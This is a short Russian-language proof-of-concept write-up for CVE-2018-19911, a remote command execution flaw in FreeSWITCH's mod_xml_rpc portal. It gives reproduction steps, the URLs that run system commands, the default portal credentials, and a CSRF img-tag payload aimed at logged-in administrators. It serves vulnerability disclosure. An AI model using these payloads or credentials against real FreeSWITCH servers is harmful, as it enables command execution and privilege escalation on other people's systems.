
удаленное выполнение команд во всех версиях FreeSWITCH (cve-2018-19911)
версия:<=1.8.2
модуль:mod_xml_rpc
Я протестировал в общей сложности три версии (ссылка для скачивания: http://files.freeswitch.org/).
Установите версию freeswitch 1.5.15 для Windows (http://files.freeswitch.org/windows/installer/x64/freeswitch.msi)
Откройте консоль и введите: load mod_xml_rpc (загрузите портал freeswitch)
Получите доступ к локальному порту 8080,
http://127.0.0.1:8080/portal/index.html
Ввод в консоли
api("system calc")илиapi("bg_system calc")

Также можно напрямую запросить интерфейс
http://127.0.0.1:8080/txtapi/system?calc или
http://127.0.0.1:8080/api/system?calc



Учетные данные по умолчанию для портала freeswitch: freeswitch:works
Вы можете проверить это самостоятельно с помощью freeswitch_rce.py
Или используйте CSRF для атаки на администратора, который вошел в систему.
<img src="http://127.0.0.1:8080/api/system?calc">

Поскольку freeswitch часто работает с высокими привилегиями, это также может привести к повышению привилегий.